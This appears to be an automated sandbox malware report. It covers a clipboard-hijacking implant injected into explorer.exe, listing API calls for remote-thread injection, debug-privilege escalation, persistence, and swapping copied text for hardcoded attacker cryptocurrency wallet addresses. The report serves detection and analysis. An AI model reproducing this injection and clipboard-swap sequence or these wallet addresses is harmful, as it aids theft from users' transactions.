Not Executed

APIs

CreateFileW.KERNEL32 ref: 0982F314
GetFileSize.KERNEL32 ref: 0982F347
GetProcessHeap.KERNEL32 ref: 0982F350
HeapAlloc.KERNEL32 ref: 0982F361
ReadFile.KERNEL32 ref: 0982F385
GetProcessHeap.KERNEL32 ref: 0982F399
HeapFree.KERNEL32 ref: 0982F3A7
CloseHandle.KERNEL32 ref: 0982F3B0

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 3250796435-0
Opcode ID: a570c59ff07c8582ff7f9362800e75dde1297c6a14a7e496a45d1ca199ab8740
Instruction ID: a53f27f7cd4bc50ee96639e13906edc746763095c0950efb720ddfb2cb993077
Opcode Fuzzy Hash: a570c59ff07c8582ff7f9362800e75dde1297c6a14a7e496a45d1ca199ab8740
Instruction Fuzzy Hash: 3E418036300B5187EB50CF26E84876A77A4FB89B95F558129DF9E93B54EF38C089CB10

Function 0982F170 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0982F040: GetWindowsDirectoryW.KERNEL32 ref: 0982F093
Part of subcall function 0982F040: GetVolumeInformationW.KERNEL32 ref: 0982F0E2
Part of subcall function 0982F040: wsprintfW.USER32 ref: 0982F144

SHGetFolderPathW.SHELL32 ref: 0982F1D5
lstrcatW.KERNEL32 ref: 0982F1E5
lstrcatW.KERNEL32 ref: 0982F1F3
CreateDirectoryW.KERNEL32 ref: 0982F1FE
SetFileAttributesW.KERNEL32 ref: 0982F20C
lstrcatW.KERNEL32 ref: 0982F21C
lstrcatW.KERNEL32 ref: 0982F22A
lstrcatW.KERNEL32 ref: 0982F23A

Strings

.exe, xrefs: 0982F230

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
String ID: .exe
API String ID: 1846285901-4119554291
Opcode ID: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
Instruction ID: afc5690ab2a24c539ed2fe54bdbd0f6e66bcd2cceaf301f4a491210a7b6ca08d
Opcode Fuzzy Hash: 9ec7a06dd3bee4f417e31b6d81151dd5dc19d44b86899af2f6cd87a0b36f0899
Instruction Fuzzy Hash: 4C210F32319F4286EA90DF25F85875E33A1F78AB84F42A435DA9E87715EE39C118CB40

Function 09837540 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 332
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 09837AF0: OpenClipboard.USER32 ref: 09837B01
Part of subcall function 09837AF0: GetClipboardData.USER32 ref: 09837B13
Part of subcall function 09837AF0: GlobalLock.KERNEL32 ref: 09837B24
Part of subcall function 09837AF0: GlobalUnlock.KERNEL32 ref: 09837B35
Part of subcall function 09837AF0: CloseClipboard.USER32 ref: 09837B3B

Part of subcall function 09837CE0: GlobalAlloc.KERNEL32 ref: 09837D08
Part of subcall function 09837CE0: GlobalLock.KERNEL32 ref: 09837D1F
Part of subcall function 09837CE0: GlobalUnlock.KERNEL32 ref: 09837D37
Part of subcall function 09837CE0: OpenClipboard.USER32 ref: 09837D3F
Part of subcall function 09837CE0: EmptyClipboard.USER32 ref: 09837D45
Part of subcall function 09837CE0: SetClipboardData.USER32 ref: 09837D53
Part of subcall function 09837CE0: CloseClipboard.USER32 ref: 09837D59

Sleep.KERNEL32 ref: 09837AA0

Strings

XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH, xrefs: 09837A38
LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK, xrefs: 0983775E
TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq, xrefs: 098376CC
rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv, xrefs: 09837914
bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze, xrefs: 098377F0
DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5, xrefs: 098379A6
0xe082eae973143a32d82db061b6c8885ceba72b87, xrefs: 0983763A
1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6, xrefs: 098375A8
addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0, xrefs: 09837882

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
String ID: 0xe082eae973143a32d82db061b6c8885ceba72b87$1BZS1JgAFe13aBqMdLZS2eN31NtpYQA6y6$DU8bbCYGxj3be3XDMiipMJdFFGHgwDzLB5$LNYd8g8WfirJtTvQuhrEZ5BD9hua18kaVK$TMjbm61ctPtZqDVxeZHgXRw4Tq8gzZo9Jq$XuLskqV3efHE8eaJDu8oeeLoUn6hHpUAyH$addr18kvGyaCauRTSejv3qoSvmsXBGn77NhdfFjj3s9l2ccgr2fqzs9p7cl8rr2ckq4c7emm9uaa0s7ynk32ysaxmr5xaazqj4gex0$bitcoincash:qr7r9w340hvnxqjm2cjpj3kd0s7kfz02ks5su6hrze$rNcd1L9tTLohuJh45vUtcisKcgGJTCtnTv
API String ID: 2992153386-2300265441
Opcode ID: ef6a4bfc034eb6a153bef323cbf05477a6a9cfc505bd8e7af2e175d1072a2601
Instruction ID: 451d83e019221b4b92beee27a868f2fb1adc4915293cf33e0df1d20f7fa6d651
Opcode Fuzzy Hash: ef6a4bfc034eb6a153bef323cbf05477a6a9cfc505bd8e7af2e175d1072a2601
Instruction Fuzzy Hash: 8CD12AA1710A46A5EF00EFB9D4543DC6362E755BCCFC0E51A9A0DDBB58EF24C249C391

Function 098350D0 Relevance: 10.6, APIs: 7, Instructions: 65
stringsleepCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyA.KERNEL32 ref: 0983512F

Part of subcall function 09829450: EnterCriticalSection.KERNEL32 ref: 09829498
Part of subcall function 09829450: RtlInitializeCriticalSection.NTDLL ref: 098294A5
Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294DA
Part of subcall function 09829450: lstrcpyA.KERNEL32 ref: 098294FD
Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982950D
Part of subcall function 09829450: lstrcatA.KERNEL32 ref: 0982951D
Part of subcall function 09829450: LeaveCriticalSection.KERNEL32 ref: 098295A4
Part of subcall function 09829450: memcpy.MSVCRT ref: 098295BC
Part of subcall function 09829450: lstrlenA.KERNEL32 ref: 098295CA

lstrcmp.KERNEL32 ref: 09835156
free.MSVCRT ref: 098351CA
Sleep.KERNEL32 ref: 098351D5

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSectionlstrcpy$lstrcat$EnterInitializeLeaveSleepfreelstrcmplstrlenmemcpy
String ID:
API String ID: 4292776791-0
Opcode ID: 96e53470d1276391f0d3e9ebc9b3fe0843cd8b69290cef162e5c6cd72c2f1f32
Instruction ID: 9d1ad0410873180ea309083ade39250127013dee7d0f6a20fb5f40cd36539e4f
Opcode Fuzzy Hash: 96e53470d1276391f0d3e9ebc9b3fe0843cd8b69290cef162e5c6cd72c2f1f32
Instruction Fuzzy Hash: 9A219435219B41C5EB14DF16A85435EB7A5FB99B84F84D028EA8E87B15EF3CC104CB84

Function 0982F040 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32 ref: 0982F093
GetVolumeInformationW.KERNEL32 ref: 0982F0E2
wsprintfW.USER32 ref: 0982F144

Strings

:, xrefs: 0982F0D0
%08lX%04lX%lu, xrefs: 0982F136

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu$:
API String ID: 3001812590-1109288774
Opcode ID: 6bb8f0452dc48ed42a104bb424a482e778bff8d2b367419224321099e76585b0
Instruction ID: d5f08cdb818e6066c8afc78d1d989ce46204c627231a11b34392d58afb6d1909
Opcode Fuzzy Hash: 6bb8f0452dc48ed42a104bb424a482e778bff8d2b367419224321099e76585b0
Instruction Fuzzy Hash: 9D311A36218A80D6D710CFA5E85035AB7B0F799744F91541AEB8DC3B28EB7DC544CF00

Function 0982EF20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32 ref: 0982EF6C
GetVolumeInformationA.KERNEL32 ref: 0982EFB6
wsprintfA.USER32 ref: 0982F017

Strings

%08lX%04lX%lu, xrefs: 0982F009
:\, xrefs: 0982EFA6

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: DirectoryInformationVolumeWindowswsprintf
String ID: %08lX%04lX%lu$:\
API String ID: 3001812590-790759568
Opcode ID: f49aab7a8f087b4db7fdd291aae639e20113c460a4db87b972b1626037c6f69d
Instruction ID: 37a31e3bf2f1351b99af7d038d4b382c16281566c141dc244f5aed2bd6d1553a
Opcode Fuzzy Hash: f49aab7a8f087b4db7fdd291aae639e20113c460a4db87b972b1626037c6f69d
Instruction Fuzzy Hash: E3311C36218B80DAD710CF69E45034ABBB1F79A754F95551AEBC983B29DB3CC549CB00

Function 09828FE0 Relevance: 6.0, APIs: 4, Instructions: 34
threadmemoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenThread.KERNEL32 ref: 0982900C
ResumeThread.KERNEL32 ref: 0982901D
CloseHandle.KERNEL32 ref: 09829026
HeapFree.KERNEL32 ref: 09829044

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseFreeHandleHeapOpenResume
String ID:
API String ID: 993137029-0
Opcode ID: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
Instruction ID: 1e8f34a539891c18350d43e69fcbafec759b5565d4a2da9e22ee00e29494fb33
Opcode Fuzzy Hash: 350b1093ccfd2c3c2c73eb94d1ee066efdd318783ec75fd0ecdc008773dfeb84
Instruction Fuzzy Hash: 29018C36615A9482EB04CF62E99431D7361FB8AFC4F09D029DB0A87B15CF3AC0A6CB04

Function 0983B3C0 Relevance: 6.0, APIs: 4, Instructions: 24
synchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 0983B3D0
CloseHandle.KERNEL32 ref: 0983B3E0
GetLastError.KERNEL32 ref: 0983B3EE
CloseHandle.KERNEL32 ref: 0983B3FE

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID:
API String ID: 2372642624-0
Opcode ID: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
Instruction ID: 08d9da7ff60fcb679923da75814e35c2605c94f50e77975073c8e1b66459516f
Opcode Fuzzy Hash: 58190a93ded2dde5e8871cad741f0538f53c091da1e701dab678116d39fd0d8f
Instruction Fuzzy Hash: 2EE086A5601B0083EF291B71688637A1350AB5E701F85982DC80EC9342EE3C81DD8304

Function 09828750 Relevance: 4.6, APIs: 3, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0982879A
VirtualProtect.KERNEL32 ref: 09828803
FlushInstructionCache.KERNEL32 ref: 09828818

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CacheFlushInstruction
String ID:
API String ID: 882653843-0
Opcode ID: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
Instruction ID: 7f087a7485e1b71f325fd778ad415d4b1122a85bdfb86a089daece91274dd4ed
Opcode Fuzzy Hash: 75f636435a0f4809db09609f496f6760a96ec8b1148eb731a98781e445c4eafc
Instruction Fuzzy Hash: 0031E1672086D08ADB11CF36E50036D7B60F31AF88F09821AEF898B79ACF2CD495C755

Function 09835450 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 098351E0: lstrlenA.KERNEL32 ref: 09835282
Part of subcall function 098351E0: InternetCrackUrlA.WININET ref: 09835297
Part of subcall function 098351E0: PathFindFileNameW.SHLWAPI ref: 0983531C
Part of subcall function 098351E0: GetTempPathW.KERNEL32 ref: 09835336
Part of subcall function 098351E0: GetTempFileNameW.KERNEL32 ref: 0983534C
Part of subcall function 098351E0: lstrcatW.KERNEL32 ref: 0983535C
Part of subcall function 098351E0: lstrcatW.KERNEL32 ref: 09835368
Part of subcall function 098351E0: CreateFileW.KERNEL32 ref: 09835391

Part of subcall function 0982F170: SHGetFolderPathW.SHELL32 ref: 0982F1D5
Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F1E5
Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F1F3
Part of subcall function 0982F170: CreateDirectoryW.KERNEL32 ref: 0982F1FE
Part of subcall function 0982F170: SetFileAttributesW.KERNEL32 ref: 0982F20C
Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F21C
Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F22A
Part of subcall function 0982F170: lstrcatW.KERNEL32 ref: 0982F23A

DeleteFileW.KERNEL32 ref: 098354E5
CopyFileW.KERNEL32 ref: 098354FB
SetFileAttributesW.KERNEL32 ref: 0983550C

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Filelstrcat$Path$AttributesCreateNameTemp$CopyCrackDeleteDirectoryFindFolderInternetlstrlen
String ID:
API String ID: 3447680573-0
Opcode ID: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
Instruction ID: 56e869f57f9d7b700425cbdf3880e64a0061f3b857b3637bf88c77ef56ca2710
Opcode Fuzzy Hash: 7f49b66afa7c0b190dc72cc57ffd92d7ba36ceae248c7b52d8005671203e4e27
Instruction Fuzzy Hash: FB217122324AC592DB30DF25E9A436BA321FB89788FC1D015D64D87A49EF2CC209CB45

Function 09828AA0 Relevance: 4.5, APIs: 3, Instructions: 45threadinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 098288B0: GetCurrentProcessId.KERNEL32 ref: 0982890B
Part of subcall function 098288B0: GetCurrentThreadId.KERNEL32 ref: 09828917
Part of subcall function 098288B0: HeapAlloc.KERNEL32 ref: 09828941
Part of subcall function 098288B0: Thread32Next.KERNEL32 ref: 098289A0
Part of subcall function 098288B0: CloseHandle.KERNEL32 ref: 098289B0

OpenThread.KERNEL32 ref: 09828AEE
SuspendThread.KERNEL32 ref: 09828AFF

Part of subcall function 09828EA0: GetThreadContext.KERNEL32 ref: 09828ED4
Part of subcall function 09828EA0: SetThreadContext.KERNEL32 ref: 09828F94

CloseHandle.KERNEL32 ref: 09828B16

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseContextCurrentHandle$AllocHeapNextOpenProcessSuspendThread32
String ID:
API String ID: 4205413918-0
Opcode ID: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
Instruction ID: dd366f3d53346c5f24992c3dde4cded373489e797029e1004e253884571dfc7e
Opcode Fuzzy Hash: fb0b88b831a84adbd08517c03dc5737f98b5e285529bda5c5170a0eb1dd0c5da
Instruction Fuzzy Hash: 01016136205B9487DB14DF16A48061EB760F789F80F489029EF4A83B18CF38D0A1CB04

Function 09828DB0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 09828860: Sleep.KERNEL32 ref: 0982888C

HeapCreate.KERNEL32 ref: 09828DCD

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
Instruction ID: 57eee8e8ca34ff3005e6cdcdae47f0748de75b7d75b6b103036658c4af963830
Opcode Fuzzy Hash: 2566898438aa13b641ec1c9a74339e6218832f4f3109a69167c1f6b2db446f76
Instruction Fuzzy Hash: 84E0DF50B0272043FF69BFBA58E23291140DF1A310F4CA43CDE08C9782EE2C98EB5766

Non-executed Functions

Function 09821370 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 179fileinjectionprocessCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 098213C8
GetFileSize.KERNEL32 ref: 098213F3
malloc.LIBCMT ref: 098213FD
ReadFile.KERNEL32 ref: 09821418
CloseHandle.KERNEL32 ref: 09821421
CreateProcessA.KERNEL32 ref: 09821484
GetThreadContext.KERNEL32 ref: 098214EF
VirtualAllocEx.KERNEL32 ref: 09821518
WriteProcessMemory.KERNEL32 ref: 09821537
WriteProcessMemory.KERNEL32 ref: 0982157C

Strings

@, xrefs: 09821510

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
String ID: @
API String ID: 596952117-2766056989
Opcode ID: 4fee09da6d689d869712edbc9f3647fd5830afbe0c47d0c9cd235d62fc0a3f09
Instruction ID: 1eb945f0753d66514a69a1e15bb2cd7d2d59bef93375b00327f054e41069efb5
Opcode Fuzzy Hash: 4fee09da6d689d869712edbc9f3647fd5830afbe0c47d0c9cd235d62fc0a3f09
Instruction Fuzzy Hash: 9B814976704F908AEB60CF66E84479EB7A5F789B98F514119EE8D87B18DF38C059CB00

Function 09823100 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 93injectionlibrarymemoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 09823143
GetModuleHandleA.KERNEL32 ref: 09823161
GetProcAddress.KERNEL32 ref: 09823171
CloseHandle.KERNEL32 ref: 09823182
VirtualAllocEx.KERNEL32 ref: 098231AB
WriteProcessMemory.KERNEL32 ref: 098231CF
CreateRemoteThread.KERNEL32 ref: 098231F9
CloseHandle.KERNEL32 ref: 09823207
CloseHandle.KERNEL32 ref: 09823210

Strings

@, xrefs: 098231A0
LoadLibraryA, xrefs: 09823167
kernel32.dll, xrefs: 09823155

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
String ID: @$LoadLibraryA$kernel32.dll
API String ID: 752146563-1829755052
Opcode ID: aceee3e72daa409afe0c74074086a186fcbb32be1051051977a91a2bbe77d00d
Instruction ID: 8144cae2ae4e64a96cd2aa56471151ae246e7683adeeb904a5b267b9cbfc4eaf
Opcode Fuzzy Hash: aceee3e72daa409afe0c74074086a186fcbb32be1051051977a91a2bbe77d00d
Instruction Fuzzy Hash: 88318121305F5082EB149F16B82435A63A4FB8AFC1F54802AEE4E87B65DF3CC149CB00

Function 03320BF0 Relevance: 22.8, APIs: 5, Strings: 10, Instructions: 267COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03320C78

Part of subcall function 0333CB0C: _FF_MSGBANNER.LIBCMT ref: 0333CB3C
Part of subcall function 0333CB0C: _NMSG_WRITE.LIBCMT ref: 0333CB46
Part of subcall function 0333CB0C: _callnewh.LIBCMT ref: 0333CB7A
Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB85
Part of subcall function 0333CB0C: _errno.LIBCMT ref: 0333CB90

free.LIBCMT ref: 03321020
free.LIBCMT ref: 03321028

Part of subcall function 0333CACC: _errno.LIBCMT ref: 0333CAEC

free.LIBCMT ref: 03321030
free.LIBCMT ref: 03321039

Strings

_errno, xrefs: 03320D0F
olhelp32Snapshot, xrefs: 03320D65
eCriticalSection, xrefs: 03320CD5
Process32Next, xrefs: 03320D8D
VerQueryValueA, xrefs: 03320F00
GetFileVersionInfoSizeA, xrefs: 03320DBE
ersionInfoA, xrefs: 03320EF9
isdigit, xrefs: 03320D29
isxdigit, xrefs: 03320D3D
StrChrA, xrefs: 03320DA1

Memory Dump Source

Source File: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3320000_explorer.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID: GetFileVersionInfoSizeA$Process32Next$StrChrA$VerQueryValueA$_errno$eCriticalSection$ersionInfoA$isdigit$isxdigit$olhelp32Snapshot
API String ID: 2761444284-1026861232
Opcode ID: 36c077ed5355f3fc8295b3ec08d29b47507b78eb77a2b19de5eeb13cea3bbcee
Instruction ID: d6f3c98c57a9a3c7f6d1bd70eb1e2a46c6602ecef8debdc210d58ce8e094e946
Opcode Fuzzy Hash: 36c077ed5355f3fc8295b3ec08d29b47507b78eb77a2b19de5eeb13cea3bbcee
Instruction Fuzzy Hash: CFC16F36604B9586EB15DF26FC9439A77A4F789B88F484115DE4A47B28DF3CE349CB00

Function 09823270 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 098232C6
OpenProcessToken.ADVAPI32 ref: 098232D9
LookupPrivilegeValueA.ADVAPI32 ref: 098232FD
AdjustTokenPrivileges.ADVAPI32 ref: 09823320
CloseHandle.KERNEL32 ref: 0982332B
OpenProcess.KERNEL32 ref: 0982333B

Part of subcall function 09823070: OpenProcess.KERNEL32 ref: 09823099
Part of subcall function 09823070: CloseHandle.KERNEL32 ref: 098230C1

CloseHandle.KERNEL32 ref: 09823378

Strings

SeDebugPrivilege, xrefs: 098232E8

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 2357999848-2896544425
Opcode ID: 66fffd2de0935a74dfcb0fab2122081d9215bb3b55ed28a7a9a6bcfc679ed4e5
Instruction ID: 36be710437d2135738c7d0a091930d582e922b4aa5c359fa39abf7e42208aa19
Opcode Fuzzy Hash: 66fffd2de0935a74dfcb0fab2122081d9215bb3b55ed28a7a9a6bcfc679ed4e5
Instruction Fuzzy Hash: 5C31A221314B5183EB148F26B86471AA7A1FB8AFD4F51902DEE4ED7B65EF3CC5498700

Function 09837CE0 Relevance: 10.5, APIs: 7, Instructions: 37clipboardmemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 09837D08
GlobalLock.KERNEL32 ref: 09837D1F
GlobalUnlock.KERNEL32 ref: 09837D37
OpenClipboard.USER32 ref: 09837D3F
EmptyClipboard.USER32 ref: 09837D45
SetClipboardData.USER32 ref: 09837D53
CloseClipboard.USER32 ref: 09837D59

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
String ID:
API String ID: 1677084743-0
Opcode ID: bf640c0bf7507bf40261c2d8693ea0401631c1f941285e11bd04364b3ff0d746
Instruction ID: 5116847db3d1320e00f1b980e65c01b81476540d1d1ef2864db02ff3360cb182
Opcode Fuzzy Hash: bf640c0bf7507bf40261c2d8693ea0401631c1f941285e11bd04364b3ff0d746
Instruction Fuzzy Hash: 23012C21609B5186EB04AF66B8183597361F74AFC0F449125DE4B4BB56CF3DD485C780

Function 09824200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77injectionmemorythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 09824273
WriteProcessMemory.KERNEL32 ref: 09824296
VirtualProtectEx.KERNEL32 ref: 098242B7
CreateRemoteThread.KERNEL32 ref: 098242EB

Strings

@, xrefs: 0982425D

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
String ID: @
API String ID: 1113946311-2766056989
Opcode ID: bb99e5549d4c44404210e3d2a102585b48636c082e0f941570c191f9acfe0ba0
Instruction ID: 259bb61d8c83b7b9197a65fbe984e67462aabb515232cf762b63dce5edbc339c
Opcode Fuzzy Hash: bb99e5549d4c44404210e3d2a102585b48636c082e0f941570c191f9acfe0ba0
Instruction Fuzzy Hash: 28217172305B9182DB25CF67B944B2AB6A5F749BC0F458129EE8D93B18DF3DC0458B00

Function 09837AF0 Relevance: 7.5, APIs: 5, Instructions: 42clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 09837B01
GetClipboardData.USER32 ref: 09837B13
GlobalLock.KERNEL32 ref: 09837B24
GlobalUnlock.KERNEL32 ref: 09837B35
CloseClipboard.USER32 ref: 09837B3B

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: ee642c975acfce22a74874630e39c61d92233d1f2da0fd13e9adb5dd35efcfc7
Instruction ID: b9ecde48dc4c2bedef0eedd16ea60ab32405b2feaac2ac12385f6d8d34d7ecae
Opcode Fuzzy Hash: ee642c975acfce22a74874630e39c61d92233d1f2da0fd13e9adb5dd35efcfc7
Instruction Fuzzy Hash: 1B016262718B4182EE099F16B9883296361AB49FC0F48E139EE1F4B759DF3CD196C740

Function 09850350 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, Offset: 09820000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9820000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524efeb79b42dd35c7640904553f5aa16a952790f49f4c8bf7545cbca815e198
Instruction ID: 130ae406d6412bb1ba65ba1aebe94fcb09a98b242f7ce3c534f8e11ba3cc339f
Opcode Fuzzy Hash: 524efeb79b42dd35c7640904553f5aa16a952790f49f4c8bf7545cbca815e198
